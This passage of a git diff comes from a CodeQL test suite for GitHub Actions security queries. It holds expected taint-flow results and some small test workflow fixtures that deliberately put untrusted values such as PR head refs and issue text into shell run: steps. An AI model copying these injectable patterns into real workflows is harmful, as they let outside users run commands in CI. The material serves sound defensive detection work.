who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | -nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | -| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | -subpaths -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -#select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential injection from the ${{ matrix.language }}, which may be controlled by an external user. | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | -| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | -| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql deleted file mode 100644 index f8d6e0c804b..00000000000 --- a/ql/src/test/test.ql +++ /dev/null @@ -1,37 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity warning - * @security-severity 9.3 - * @precision high - * @id actions/command-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) -select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + - " }}, which may be controlled by an external user." diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 00000000000..8494dea432f --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.2.9 +compiled: false diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/test/library-tests/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/.github/workflows/test.yml rename to ql/test/library-tests/.github/workflows/test.yml diff --git a/ql/lib/test/test.expected b/ql/test/library-tests/test.expected similarity index 100% rename from ql/lib/test/test.expected rename to ql/test/library-tests/test.expected diff --git a/ql/lib/test/test.ql b/ql/test/library-tests/test.ql similarity index 100% rename from ql/lib/test/test.ql rename to ql/test/library-tests/test.ql diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml new file mode 100644 index 00000000000..d85fc698394 --- /dev/null +++ b/ql/test/qlpack.yml @@ -0,0 +1,12 @@ +--- +name: githubsecuritylab/actions-tests +groups: + - actions + - test +dependencies: + githubsecuritylab/actions-all: ${workspace} + githubsecuritylab/actions-queries: ${workspace} +extractor: yaml +tests: . +warnOnImplicitThis: true + diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml similarity index 99% rename from ql/src/test/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml index 79c2d072ef5..cc3f3c2863c 100644 --- a/ql/src/test/.github/workflows/calling_composite.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml @@ -12,3 +12,4 @@ jobs: who-to-greet: ${{ github.event.pull_request.head.ref }} - run: echo ${{ steps.foo.outputs.reflected}} - run: echo ${{ steps.foo.outputs.tainted}} + diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml similarity index 99% rename from ql/src/test/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml index 7c2bfdf0348..239ea7ab387 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml @@ -44,3 +44,4 @@ jobs: needs: call4 steps: - run: echo ${{ needs.call4.outputs.workflow-output }} + diff --git a/ql/src/test/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml similarity index 99% rename from ql/src/test/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 45c177edecb..0ca7ecdfbde 100644 --- a/ql/src/test/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -31,3 +31,4 @@ jobs: - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 + diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected new file mode 100644 index 00000000000..d31268b12b5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -0,0 +1,15 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | +| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +#select +| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | +| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref new file mode 100644 index 00000000000..f8e1bfca630 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref @@ -0,0 +1 @@ +Security/CWE-020/CompositeActionsSinks.ql diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected new file mode 100644 index 00000000000..23369932e81 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -0,0 +1,12 @@ +edges +| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +nodes +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | +| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +subpaths +#select +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref new file mode 100644 index 00000000000..dce31c31923 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/CompositeActionsSources.ql + diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected new file mode 100644 index 00000000000..8ec7f44dba3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -0,0 +1,12 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | +| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +subpaths +#select +| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref new file mode 100644 index 00000000000..007941cd2f5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/CompositeActionsSummaries.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected new file mode 100644 index 00000000000..c9e26d368df --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +subpaths +#select +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref new file mode 100644 index 00000000000..369befbce62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSinks.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected new file mode 100644 index 00000000000..8e19cd469ab --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -0,0 +1,12 @@ +edges +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +nodes +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +subpaths +#select +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref new file mode 100644 index 00000000000..cbea721ee34 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSources.ql + diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected new file mode 100644 index 00000000000..f7d715c9fa1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -0,0 +1,16 @@ +edges +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +nodes +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +subpaths +#select +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref new file mode 100644 index 00000000000..ff87d53c3d6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSummaries.ql + diff --git 